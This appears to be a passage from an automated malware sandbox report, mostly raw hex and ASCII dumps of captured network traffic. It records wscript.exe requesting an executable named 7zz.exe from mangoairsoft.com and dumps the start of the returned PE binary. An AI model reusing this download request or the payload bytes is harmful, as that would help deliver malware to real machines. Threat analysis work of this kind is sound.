                                                            Data Ascii: DALQ/gsAx9JU=-;hfKtQI[mjS=BD%[@@9A>\_QaFPLTdEZ<IGS3;H{cdAN+ET#qWOChk5N2Wkf[+qfoSD7<6)3"'hK-,y|f7.9g'
                                                            2023-08-02 08:13:02 UTC2130INData Raw: 84 05 29 13 be 99 1b 14 d7 69 be 54 dc 18 1e eb d6 c9 0b 09 e4 b2 a7 f2 c1 1a ba 27 b9 98 05 c4 1c 54 a9 06 77 c0 12 38 83 74 af 10 a3 37 29 d2 4c e4 16 e8 d4 87 6a 8b 71 c0 15 28 db 8f 7f 95 cd 58 c0 92 d1 f9 cc 81 b0 8d c2 d6 f9 62 3e 76 ce 07 ee 3b a6 4c 0a 81 c5 1a a3 f3 eb 1e 6f c3 9e d6 4a d2 04 ec 22 cd 6b 38 d5 8b e8 5f bf 52 26 1e 8e f9 8a bc 62 bb b3 a9 5c dd 66 ac d1 fb b0 7d 61 90 16 aa 04 4f 33 ad 0c 5a 51 db 3b 83 ef 93 fa 3d 2b fc ed f6 00 02 79 c8 dc 05 e9 42 4e 53 68 5c c5 3d d8 49 ad 39 46 8a 57 ad 6e f6 db b3 8a fc 7b e4 4c 04 c2 07 d6 4b 86 73 ac 58 5a 02 7e bd 9e b4 20 3c ef d1 22 6b fa 80 7e 95 38 39 69 8f d0 8c 95 ac b5 fe 89 8e cc 63 ff 53 cf 6a eb 51 ce db 17 a4 4e 1a cc 2f 08 7b 08 7c 6a 30 a2 e7 f0 5b 99 7d 07 de 5e 55 76 60 de
                                                            Data Ascii: )iT'Tw8t7)Ljq(Xb>v;LoJ"k8_R&b\f}aO3ZQ;=+yBNSh\=I9FWn{LKsXZ~ <"k~89icSjQN/{|j0[}^Uv`
                                                            2023-08-02 08:13:02 UTC2146INData Raw: 45 08 12 62 eb 8e bf af 0e 6b 1e 55 b8 cd 93 14 70 bf 39 3e 86 4e 39 43 13 0b de 13 60 27 22 32 f2 51 74 e9 e1 e3 29 87 a7 29 03 00 64 39 3a 31 93 49 a5 ba 39 99 83 e5 18 2f c7 de e1 bd 1b f2 86 b8 6a ae ec 39 f7 04 79 61 e4 cf 3c d9 39 ee 29 81 cc ac 8f ca 1b de 91 3d f5 13 5f 04 f6 c6 21 54 f5 6d d7 63 c1 2a 47 ee d0 6a 2b 1a ed 08 a9 dc 0a 71 36 9c 57 57 7b ec 91 1a 04 e6 bd f8 fd 05 32 48 dd 20 4b 7e ae d7 fa 6c 45 f5 6b 0a 99 3a a4 57 55 42 5c c6 f5 0c 3e 11 27 d5 3b 6e 8c 94 f5 f2 f8 b5 fa 79 fb e9 26 ec 55 3a 17 93 a6 9c c9 31 82 23 4f 12 7b 31 e9 92 ac 4b 72 90 c8 ea 77 bf d1 94 9a 44 79 62 ea cd 60 90 cc 85 89 99 34 5f 7d 28 4d e0 fe e1 0a 9d a8 84 d6 56 3b d7 28 e9 44 d3 52 64 b5 67 7e 9d 56 98 b9 b0 cd 07 81 a8 3b bc 6a d1 b0 10 26 bd 43 56 04
                                                            Data Ascii: EbkUp9>N9C`'"2Qt))d9:1I9/j9ya<9)=_!Tmc*Gj+q6WW{2H K~lEk:WUB\>';ny&U:1#O{1KrwDyb`4_}(MV;(DRdg~V;j&CV
                                                            2023-08-02 08:13:02 UTC2162INData Raw: 7c 29 7e dc ed 17 ed de e7 03 19 45 71 f5 b9 de 00 a7 6f 4a 3d d0 09 65 36 a4 64 59 bd d9 59 29 29 29 ea e6 ef 8b e5 ca 49 49 49 dd 19 f6 6c 33 5b 10 c4 69 87 24 25 1a 8d c8 32 4b e5 35 0a 95 1c f7 16 09 93 25 69 43 2b 41 36 84 63 d9 1c f7 d4 21 ea 81 e0 c2 39 85 55 6f 63 f1 e3 bf 50 20 4a 7d e9 9a 2d a4 9b be 57 dd 56 66 b7 ba 07 2d 3d 01 99 08 70 c7 e4 01 6a 39 b6 c2 e1 d2 23 50 df 31 95 3b 43 41 41 72 55 20 03 5b f8 e1 79 5b 40 8d 8a 98 6c 0a 29 a2 2b ba 47 0b 4e 92 b6 26 e3 6c cb 6a bf c8 92 a5 1f 42 b3 54 30 8a a1 7d 88 07 98 08 86 a5 ef 44 b3 09 71 06 52 8a 05 b5 b8 f6 62 f1 74 42 f4 fc ce bf 94 2e 10 3e 05 44 14 fc d2 86 8c 0d 8d 49 20 e4 12 c8 b1 ad 48 e0 89 e2 82 84 75 27 dd 8e 4d 28 9c e4 d9 bd 05 b7 b3 43 56 9f a6 7c ac a6 f4 6c df 02 08 b9 2d
                                                            Data Ascii: |)~EqoJ=e6dYY)))IIIl3[i$%2K5%iC+A6c!9UocP J}-WVf-=pj9#P1;CAArU [y[@l)+GN&ljBT0}DqRbtB.>DI Hu'M(CV|l-
                                                            2023-08-02 08:13:02 UTC2178INData Raw: ff 7b 25 45 72 1b a5 70 cc 12 5c 70 67 60 1a 1e a2 04 cf 1e 93 cf cc 9d 44 ad 4d 6a bf 47 5c ff 20 b1 c6 63 3e 47 8c d5 2a af 9f b2 4d 1f 67 97 27 f8 51 3f db 7d 7b 72 33 e8 83 62 97 ce 0c 07 65 6e c5 ba a4 e1 8c 9f a1 8c 2d 53 01 e4 12 15 5c 19 af 17 d6 2f 4e 4f 8c 82 72 e2 4e 7c 1e b9 84 f7 09 07 4e 60 a3 98 4a 73 77 24 53 9d fc ba f5 90 1e 9c 39 e7 0c 05 b2 fa 67 96 d1 14 79 1d cf d0 94 d4 bd ee b3 fc 07 ad fc 4d 8d 9d 38 34 bc 43 ad 74 31 4e 76 08 5e 94 8a e1 de 0a 47 74 51 4a f3 7e 4a f4 77 40 93 06 9e c2 37 c7 f0 2c ec a2 a3 ca b4 ac c7 64 95 70 62 4f 9c 58 3c 47 5c 27 73 ed b2 7f 39 79 1b 47 e8 b0 2b bf 80 34 db 11 a4 18 0d c6 ac a7 7a 04 cc eb c0 78 01 91 5b bc 68 54 82 cc 7e 56 d7 f3 53 e5 1d a6 4d 87 2e 62 29 4a 12 c8 ca aa 7a 9b 13 dd 19 5b 85
                                                            Data Ascii: {%Erp\pg`DMjG\ c>G*Mg'Q?}{r3ben-S\/NOrN|N`Jsw$S9gyM84Ct1Nv^GtQJ~Jw@7,dpbOX<G\'s9yG+4zx[hT~VSM.b)Jz[
                                                            2023-08-02 08:13:02 UTC2194INData Raw: c6 ce f7 a9 f2 5c b5 5d 5c ae 47 e8 0c 68 0e cc ea c9 38 fa b5 52 54 50 c6 90 c6 7a 2d 6f a1 d5 55 99 88 88 16 8d e3 b1 ae dc c1 15 ed bf ad 12 1d 94 3e c3 a9 7f a2 25 bf d7 86 99 d8 a0 bb 99 20 38 b5 b0 d4 7c f8 59 65 88 20 08 8e 7a 54 de 0f 0f db cb 12 9d 3a ee e3 f0 5f 9d bf 66 db e6 fd ad 29 ed 5b 4d db 65 c9 46 5d 03 d2 30 2f 5e 46 25 0f c6 ff c1 79 53 22 25 20 b5 b9 50 fe bb 4e 1f cd 4d 2a 5b 68 39 d6 42 70 68 a0 1f 35 78 d1 87 6b d9 ab 6b 8f 19 c5 fe 1c aa c4 1d c6 0d ae 51 d2 60 f7 ac 48 f6 cd a9 56 16 37 37 f7 36 f5 8d b6 3e f7 61 19 a8 0f 37 01 8d 51 92 82 b4 c9 51 fd f7 21 8c eb d7 aa aa 4a bb f1 ba 51 64 4f 68 40 01 ee c6 c3 e8 ba d5 2b 07 56 4f 84 3a b5 38 cc 82 b6 48 82 00 82 8c 38 d9 b9 b1 36 ac 82 ed 66 45 f0 1f db 90 cb d6 db 00 8f c8 b3
                                                            Data Ascii: \]\Gh8RTPz-oU>% 8|Ye zT:_f)[MeF]0/^F%yS"% PNM*[h9Bph5xkkQ`HV776>a7QQ!JQdOh@+VO:8H86fE
                                                            2023-08-02 08:13:02 UTC2210INData Raw: 01 79 e4 71 bc 69 b4 8f 13 66 2e 37 6b f9 b7 bf 9b 02 0d 7f 5c fc 34 5e bc 88 68 7b 31 70 66 77 7a 33 7c a7 b1 93 a4 e4 1b bb ae 71 ce 8b f3 5a 66 99 2c 7a 28 7d 04 4c 96 c4 e4 72 17 5d 2d a7 72 e8 7b 61 d8 0b d8 c9 42 f7 69 26 46 a6 13 e4 34 41 e1 32 07 c0 33 00 e4 81 c9 c3 10 8e 81 2f 15 7c 6c 42 c7 26 1c 12 70 08 c7 23 04 87 10 1c 61 f2 13 38 cb 83 f7 85 8b da ca 7d ba 5b 83 2c 31 a3 76 7e d2 2f cb 59 74 92 dc 5f f1 b7 3b 71 3b 4d 8d d3 5e c3 08 1b f2 e0 18 dc 04 ca 4f f0 89 0b 69 fa d4 fe 52 5f 46 bf fd 95 1c ad 90 9d 55 a5 3b 75 ec 40 49 50 9a 76 5d 62 0c 18 03 b6 e4 32 60 3b 70 19 03 e1 92 84 5c ce a3 6b e5 02 8e c0 30 38 82 41 1c 17 4e 2d a2 70 84 ae 3a 99 7c 80 b1 a3 24 e5 b8 ba d7 93 c2 94 6e 30 18 5c 83 dc 87 ca 19 95 f2 70 e5 c1 70 86 60 38 87
                                                            Data Ascii: yqif.7k\4^h{1pfwz3|qZf,z(}Lr]-r{aBi&F4A23/|lB&p#a8}[,1v~/Yt_;q;M^OiR_FU;u@IPv]b2`;p\k08AN-p:|$n0\pp`8
                                                            2023-08-02 08:13:02 UTC2226INData Raw: 60 20 5c 3c 64 2a ab 3e 71 69 91 b5 e9 09 d4 ea fa 90 e0 e7 43 45 de ec 3f 6d 0f 5d 3f 29 7a cf 57 1d a6 95 99 1c 66 0a 57 f3 6c a7 f7 d9 7e 20 c7 e7 39 68 b2 07 78 9b ef df 67 91 91 cc bb 5e 12 ff f3 64 19 2d ce b5 1d 26 fb 9b f2 5c 1f 5a 68 af 8f e5 7a 47 4e 0b b3 56 e6 57 d6 3c 9d 92 9b e6 84 3e 14 e7 3b ee e3 fd 2b 99 ee cd 57 af 56 6a 22 55 4a 28 da 55 02 f3 0c a9 75 3c b2 46 8d bf 45 86 25 f2 37 19 60 06 32 b7 80 cc 04 aa 35 20 38 04 b5 bc cc f3 22 36 e0 7f 7f ee 33 92 0d 0f ca 11 e3 a1 a6 fd 5c 3e 3f 70 1f 5f 1d cd a4 f2 41 48 07 4a 4f c2 05 0b 51 6e 16 64 4c 12 54 ec 7c 3d b3 09 e8 18 4b 55 a3 89 25 82 d7 eb 0b a9 41 cd 7d 65 39 8d 95 49 29 59 bd 2f 08 33 b0 c1 ba 35 59 a7 5c bd 9e f7 b4 26 8e 02 35 b2 17 d6 ca ce 56 5c ca a1 1a a5 98 90 d2 ef e3
                                                            Data Ascii: ` \<d*>qiCE?m]?)zWfWl~ 9hxg^d-&\ZhzGNVW<>;+WVj"UJ(Uu<FE%7`25 8"63\>?p_AHJOQndLT|=KU%A}e9I)Y/35Y\&5V\
                                                            2023-08-02 08:13:02 UTC2242INData Raw: da e3 50 bb df 8f 07 22 f2 0f 21 ed 0d bd 46 f2 7b 16 02 ee df ad 09 94 a3 93 b1 9b 6b d9 e3 2c a7 9b de 8a ba 2f 22 6f 2a 99 7d ef 2c 4f 46 d3 ac 0c 6e 3c bc be b1 ad 44 95 56 4b f6 4b 0c 31 3c 00 26 a1 f2 7b dd f0 2c 52 5d ba 92 02 7e d6 fb 94 2b 54 b7 cd 0a 4c d0 96 24 40 a9 7f 81 0f a2 4b 7b b0 ec 93 f2 b3 a7 83 e4 d1 d7 43 72 66 42 1d 2b a5 df a0 ff df c0 10 2b 02 64 d0 a3 bb ca fa 4f 7e 6b eb 3e 2d 06 e2 b3 73 fc fa 57 cd 20 cd 48 7a 42 72 ad fd 3b bd 1f d6 90 21 4a 0a ec 32 13 eb eb 0d 0d cb 66 b5 79 29 0c ce 95 b4 29 a1 00 c6 ed 8f 7c 7e 20 e4 9b 5a 0c cd 6b c4 cb 57 8c 6f 76 9a 4a 80 37 4c 3c 95 54 b4 f7 d5 00 d4 07 3c 90 72 34 b5 8d bc 30 7a fb 25 29 db 46 e2 69 fa c3 a6 a9 62 39 06 2a d8 b7 96 3b 92 e0 c4 fb 85 b7 b7 a4 4d 33 1d e6 2f 89 bf de
                                                            Data Ascii: P"!F{k,/"o*},OFn<DVKK1<&{,R]~+TL$@K{CrfB++dO~k>-sW HzBr;!J2fy))|~ ZkWovJ7L<T<r40z%)Fib9*;M3/


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.349700188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-08-02 08:13:04 UTC2255OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1
                                                            Host: mangoairsoft.com
                                                            User-Agent: curl/7.55.1
                                                            Accept: */*
                                                            2023-08-02 08:13:04 UTC2255INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 02 Aug 2023 08:13:04 GMT
                                                            Content-Type: application/x-msdos-program
                                                            Content-Length: 587776
                                                            Connection: close
                                                            Last-Modified: Tue, 25 Jul 2023 11:24:55 GMT
                                                            ETag: "8f800-6014dfb053871"
                                                            Accept-Ranges: bytes
                                                            2023-08-02 08:13:04 UTC2256INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 11 72 52 39 70 1c 01 39 70 1c 01 39 70 1c 01 42 6c 10 01 3b 70 1c 01 ba 6c 12 01 20 70 1c 01 0f 56 16 01 5b 70 1c 01 b7 78 43 01 38 70 1c 01 39 70 1d 01 96 70 1c 01 ba 78 41 01 3e 70 1c 01 0f 56 17 01 84 70 1c 01 56 06 b6 01 19 70 1c 01 56 06 82 01 3b 70 1c 01 fe 76 1a 01 38 70 1c 01 52 69 63 68 39 70 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}rR9p9p9pBl;pl pV[pxC8p9ppxA>pVpVpV;pv8pRich9pPEL
                                                            2023-08-02 08:13:04 UTC2271INData Raw: 3b 00 00 f6 44 24 08 01 74 07 56 e8 16 2f 00 00 59 8b c6 5e c2 04 00 b8 9c 30 47 00 e8 7d 6d 06 00 83 ec 10 53 56 57 8b f9 33 f6 8b da 6a 03 8d 4d e4 89 75 f0 89 75 e4 89 75 e8 89 75 ec e8 65 d3 ff ff 8d 55 e4 8b cb 89 75 fc e8 a5 4b 00 00 8d 45 e4 8b cf 50 e8 73 ee ff ff ff 75 e4 e8 c3 2e 00 00 59 8b c7 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 53 56 8b f1 33 db 6a 03 8d 4e 10 88 1e 88 5e 01 88 5e 02 88 5e 03 88 5e 04 89 5e 08 89 5e 0c 89 19 89 59 04 89 59 08 e8 07 d3 ff ff 89 5e 20 89 5e 24 89 5e 28 c7 46 2c 04 00 00 00 c7 46 1c 78 a6 47 00 8b c6 5e 5b c3 b8 be 30 47 00 e8 d7 6c 06 00 51 56 8b f1 57 33 ff 8d 4e 04 89 3e 6a 03 89 75 f0 89 39 89 79 04 89 79 08 e8 c3 d2 ff ff 8d 4e 10 6a 03 89 7d fc 89 39 89 79 04 89 79 08 e8 ae d2 ff ff 8d 4e 1c 6a 03
                                                            Data Ascii: ;D$tV/Y^0G}mSVW3jMuuuueUuKEPsu.YM_^[dSV3jN^^^^^^YY^ ^$^(F,FxG^[0GlQVW3N>ju9yyNj}9yyNj
                                                            2023-08-02 08:13:04 UTC2287INData Raw: d8 c1 e3 02 8b 45 08 8b 40 0c 8b 14 18 8b 46 0c 8b 0c b8 e8 94 fe ff ff 84 c0 74 09 47 83 c3 04 3b 7e 08 7c df 8b 56 08 3b fa 74 15 8b 45 0c 40 3b 45 fc 89 45 0c 7e c1 32 c0 5f 5e 5b c9 c2 08 00 b0 01 eb f5 56 57 8b f1 33 ff 39 7e 18 7e 1c 8b 46 1c 8b 54 24 0c 8b 04 b8 8d 48 04 e8 c8 fc ff ff 85 c0 74 0e 47 3b 7e 18 7c e4 83 c8 ff 5f 5e c2 04 00 8b c7 eb f7 80 7c 24 04 00 ff 74 24 08 74 05 83 c1 24 eb 03 83 c1 38 e8 48 08 00 00 c2 08 00 b8 5c 38 47 00 e8 01 2d 06 00 83 ec 4c 53 56 57 8b 7d 0c 8b f1 8b 47 08 83 f8 01 7e 5f 8b 47 0c 8b 18 8b cb 89 5d 0c e8 8a fe ff ff 84 c0 75 4c 53 8b ce e8 7a ff ff ff 8b d8 85 db 7d 27 56 8d 4d a8 ff 75 0c e8 4e 00 00 00 83 65 fc 00 50 8d 4e 10 e8 6e 07 00 00 83 4d fc ff 8d 4d a8 8b d8 e8 90 cc ff ff 8b 07 6a 01 6a 00 8b
                                                            Data Ascii: E@FtG;~|V;tE@;EE~2_^[VW39~~FT$HtG;~|_^|$t$t$8H\8G-LSVW}G~_G]uLSz}'VMuNePNnMMjj
                                                            2023-08-02 08:13:04 UTC2303INData Raw: 57 e8 14 30 00 00 85 c0 89 46 08 74 08 33 c0 eb 0d 83 66 08 00 01 7e 10 8b c7 83 56 14 00 5f 5e c2 04 00 83 e9 00 74 2c 49 74 25 49 74 1c 83 e9 03 74 11 83 e9 05 74 06 b8 05 40 00 80 c3 b8 04 40 00 80 c3 b8 57 00 07 80 c3 b8 0e 00 07 80 c3 6a 01 58 c3 33 c0 c3 8b c1 8b 4c 24 04 83 60 0c 00 89 48 08 c7 00 66 cb 40 00 c7 40 04 ac cb 40 00 c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b f1 b8 00 00 00 80 8b 0f 3b c8 89 4d 08 72 03 89 45 08 8b 46 08 8d 5d 08 53 ff 75 08 8b 08 52 50 ff 51 0c 89 46 0c 8b 45 08 89 07 8b 46 0c f7 d8 1b c0 5f 5e 83 e0 08 5b 5d c2 04 00 55 8b ec 51 51 8b 45 08 56 57 8b f9 33 c9 8b f2 2b c1 74 12 48 74 0c 48 74 05 6a 05 58 eb 34 6a 02 eb 02 6a 01 59 53 8b 47 08 8d 5d f8 8b 10 53 51 ff 76 04 ff 36 50 ff 52 10 89 47 0c 8b 45 f8 89 06 8b 45 fc
                                                            Data Ascii: W0Ft3f~V_^t,It%Ittt@@WjX3L$`Hf@@@USVW};MrEF]SuRPQFEF_^[]UQQEVW3+tHtHtjX4jjYSG]SQv6PRGEE
                                                            2023-08-02 08:13:04 UTC2319INData Raw: ff 75 fc 8b cf 56 ff 75 08 e8 8d 84 ff ff 5f 5e c9 c2 08 00 b8 ac 41 47 00 e8 80 ad 05 00 83 ec 1c 53 56 57 8b 7d 08 8b d9 6a 01 8b 47 08 89 55 f0 3b c3 5e 75 34 80 7d 10 00 75 2e ff 35 18 ba 48 00 8d 4d e4 e8 f6 29 ff ff ff 75 0c 8b 4d f0 83 65 fc 00 8d 55 e4 56 e8 7a ff ff ff 83 4d fc ff ff 75 e4 e8 bd 6e ff ff 59 3b 5f 08 7d 6a 8b 47 0c 8b 0c 98 83 79 04 00 74 48 8b 01 66 83 38 40 75 2f 8d 45 d8 56 50 e8 4a 67 ff ff ff 75 14 8b 00 8b 4d f0 8b d0 ff 75 0c 89 75 fc 56 e8 47 00 00 00 83 4d fc ff ff 75 d8 e8 77 6e ff ff 59 eb 0e ff 75 0c 8b d1 8b 4d f0 56 e8 17 ff ff ff 43 eb a7 a1 38 ba 48 00 68 58 d3 47 00 89 45 10 8d 45 10 50 e8 29 ad 05 00 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 b8 c8 41 47 00 e8 aa ac 05 00 83 ec 18 53 56 57 33 f6 bf 20 a4
                                                            Data Ascii: uVu_^AGSVW}jGU;^u4}u.5HM)uMeUVzMunY;_}jGytHf8@u/EVPJguMuuVGMuwnYuMVC8HhXGEEP)M_^[dAGSVW3
                                                            2023-08-02 08:13:04 UTC2335INData Raw: 00 60 00 8b c3 8b de 8b f2 55 99 6a 03 03 d8 55 57 13 f2 e8 66 68 05 00 6a 01 59 e8 ce 67 05 00 03 d8 13 f2 5f 8b d6 5e 8b c3 5d 5b 59 c3 53 8a 5c 24 08 56 8b f1 f6 c3 02 74 24 57 8d 7e fc 68 b4 29 44 00 ff 37 6a 18 56 e8 27 73 05 00 f6 c3 01 74 07 57 e8 cd 2e ff ff 59 8b c7 5f eb 15 8b ce e8 5c de 02 00 f6 c3 01 74 07 56 e8 b5 2e ff ff 59 8b c6 5e 5b c2 04 00 b8 80 47 47 00 e8 1b 6d 05 00 83 ec 1c 53 33 db 56 57 89 5d e0 c7 45 d8 cc aa 47 00 68 00 05 00 00 8d 4d d8 89 5d fc e8 88 f0 ff ff 84 c0 0f 84 80 00 00 00 8b 75 e0 33 c0 ba 00 01 00 00 88 04 30 40 3b c2 72 f8 8b ce e8 8b 00 00 00 3d 73 8c 05 29 75 60 8d 45 e4 ba 00 04 00 00 50 8d 8e 00 01 00 00 c7 45 e4 e5 55 9a 15 c7 45 e8 b5 3b 12 1f e8 93 00 00 00 89 5d ec 8b 45 ec 83 65 f0 00 8d 3c 30 8b 55 f0
                                                            Data Ascii: `UjUWfhjYg_^][YS\$Vt$W~h)D7jV'stW.Y_\tV.Y^[GGmS3VW]EGhM]u30@;r=s)u`EPEUE;]Ee<0U
                                                            2023-08-02 08:13:04 UTC2351INData Raw: ff 75 d0 8b f0 e8 1c ef fe ff ff 75 dc e8 14 ef fe ff ff 75 c4 e8 0c ef fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b c6 e9 65 01 00 00 ff 75 1c 8d 45 b8 8d 4d c4 50 e8 63 e8 fe ff 50 8d 4d dc c6 45 fc 05 e8 e3 92 fe ff ff 75 b8 c6 45 fc 04 e8 c9 ee fe ff 59 8d 45 b8 ff 75 1c 8d 4d c4 50 e8 6a e7 fe ff 50 8d 4d d0 c6 45 fc 06 e8 ba 92 fe ff ff 75 b8 c6 45 fc 04 e8 a0 ee fe ff 59 8d 45 d0 50 8d 45 dc 50 8b ce e8 a5 02 00 00 eb 10 8b 45 18 8b 56 08 8b 08 8d 46 08 51 50 ff 52 0c ff 75 f0 8b cf ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a1 f9 ff ff 3b c3 89 45 18 74 34 ff 75 d0 e8 56 ee fe ff ff 75 dc e8 4e ee fe ff ff 75 c4 e8 46 ee fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b 45 18 e9 9e 00 00 00 8d 45 d0
                                                            Data Ascii: uuuEM;tPQeuEMPcPMEuEYEuMPjPMEuEYEPEPEVFQPRuuuuuu;Et4uVuNuFEM;tPQEE
                                                            2023-08-02 08:13:04 UTC2367INData Raw: 74 07 8b 10 51 8b c8 ff 12 ff 45 f8 83 45 fc 0c 8b 45 f8 3b 43 08 0f 8c 77 ff ff ff 8b 4d 08 e8 1a bc fe ff 5f 5e 5b c9 c2 08 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 f0 8d 45 f0 50 e8 c1 ed 04 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 ec 8d 45 ec 50 e8 ab ed 04 00 8b 44 24 08 83 f8 01 72 07 b8 57 00 07 80 eb 2b 8b 54 24 10 8d 04 40 8b 0c 85 1c c4 48 00 8d 04 85 18 c4 48 00 89 0a 8b 4c 24 14 66 8b 40 08 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 b8 28 56 47 00 e8 ff ec 04 00 83 ec 10 33 c9 66 89 4d e4 66 89 4d e6 83 7d 0c 2c 89 4d fc 75 16 8b 45 08 38 48 30 74 0e ff 70 24 8d 4d e4 ff 70 20 e8 03 f6 fe ff ff 75 10 8d 4d e4 e8 ea f6 fe ff 83 4d fc ff 8d 4d e4 e8 3b f6 fe ff 8b 4d f4 33 c0 64 89 0d 00 00 00 00 c9 c2 0c 00 b8 3c 56 47 00 e8 a2 ec 04 00 83 ec 10
                                                            Data Ascii: tQEEE;CwM_^[HhXGEEPHhXGEEPD$rW+T$@HHL$f@fD$ 3(VG3fMfM},MuE8H0tp$Mp uMMM;M3d<VG
                                                            2023-08-02 08:13:04 UTC2383INData Raw: eb 12 48 48 e9 9d f8 ff ff b8 01 0b 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 b8 4c 5c 47 00 e8 6f ad 04 00 83 ec 34 53 56 8b f1 57 33 db 6a 03 8d 4d e4 89 5d f0 89 5d e4 89 5d e8 89 5d ec e8 59 13 fe ff 38 5e 18 8b 7e 10 89 5d fc 0f 84 4b 01 00 00 89 7d f0 4f 3b fb 7c 66 8b 46 0c 66 8b 1c 78 66 83 fb 7a 75 26 8d 45 e4 66 ba 61 00 50 8d 4d d8 e8 de 0b 00 00 50 8d 4d e4 c6 45 fc 01 e8 a4 12 fe ff 80 65 fc 00 ff 75 d8 eb 2a 66 83 fb 5a 75 63 8d 45 e4 66 ba 41 00 50 8d 4d cc e8 b2 0b 00 00 50 8d 4d e4 c6 45 fc 02 e8 78 12 fe ff 80 65 fc 00 ff 75 cc e8 5e 6e fe ff 4f 59 79 9a 8d 7e 0c 8d 45 e4 50 8b cf e8 5a 12 fe ff 8b 4d 08 57 8b d6 e8 c9 a4 fe ff ff 75 e4 e8 39 6e fe ff 8b 45 08 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9
                                                            Data Ascii: HHBM_^d[L\Go4SVW3jM]]]]Y8^~]K}O;|fFfxfzu&EfaPMPMEeu*fZucEfAPMPMExeu^nOYy~EPZMWu9nEYM_^[d
                                                            2023-08-02 08:13:04 UTC2399INData Raw: 00 a1 8c c9 48 00 a3 cc 0c 49 00 c3 8b 15 8c c9 48 00 56 8d 71 14 8b ce e8 1e 00 00 00 84 c0 75 15 8b 15 90 c9 48 00 8b ce e8 0d 00 00 00 84 c0 75 04 33 c0 5e c3 6a 01 58 5e c3 8b 09 e8 46 35 fe ff f7 d8 1b c0 40 c3 b8 80 64 47 00 e8 4c 6d 04 00 83 ec 24 53 56 8b 71 3c 57 8b 7d 08 83 7f 18 00 75 0e ff 35 cc 0c 49 00 8d 4f 14 e8 2f ea fd ff 8b cf e8 93 ff ff ff 84 c0 0f 84 42 01 00 00 83 fe 09 72 07 b8 00 00 00 04 eb 27 83 fe 07 72 07 b8 00 00 00 02 eb 1b 83 fe 05 72 07 b8 00 00 00 01 eb 0f 83 fe 03 1b c0 25 00 00 f1 ff 05 00 00 10 00 83 fe 05 8b 0d a8 c9 48 00 1b db 43 83 fe 07 1b ff 83 e7 e0 83 c7 40 83 fe 05 73 06 8b 0d a4 c9 48 00 66 83 65 e2 00 89 4d f0 66 c7 45 e0 13 00 89 45 e8 8b 4d 08 83 65 fc 00 8d 45 e0 50 6a 01 5a e8 69 03 00 00 83 ce ff 8d 4d
                                                            Data Ascii: HIHVquHu3^jX^F5@dGLm$SVq<W}u5IO/Br'rr%HC@sHfeMfEEMeEPjZiM
                                                            2023-08-02 08:13:04 UTC2415INData Raw: 6b 47 00 e8 96 2d 04 00 51 56 8b f1 89 75 f0 8d 8e 94 00 00 00 c7 45 fc 03 00 00 00 e8 f1 fa fd ff 8d 4e 7c c6 45 fc 02 e8 e5 fa fd ff 8d 4e 68 c6 45 fc 01 e8 d9 fa fd ff 80 65 fc 00 8d 4e 54 e8 cd fa fd ff 83 4d fc ff 8d 4e 04 e8 f2 aa ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 8b c1 83 60 04 00 83 60 08 00 c7 00 ec a7 47 00 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 78 b1 47 00 c3 b8 9c 6b 47 00 e8 0a 2d 04 00 51 56 8b f1 89 75 f0 c7 06 00 b3 47 00 83 65 fc 00 e8 91 fa fd ff 83 4d fc ff 8b ce e8 5d fa fd ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 b2 6b 47 00 e8 d2 2c 04 00 51 56 8b f1 6a 28 e8 29 ee fd ff 59 8b c8 89 4d f0 33 c0 3b c8 89 45 fc 74 08 ff 75 08 e8 e2 02 00 00 83 4d fc ff 50 8b ce e8 81 d0 fe ff 8b 4d f4 5e 64
                                                            Data Ascii: kG-QVuEN|ENhEeNTMNM^d``G3HHH@xGkG-QVuGeM]M^dkG,QVj()YM3;EtuMPM^d
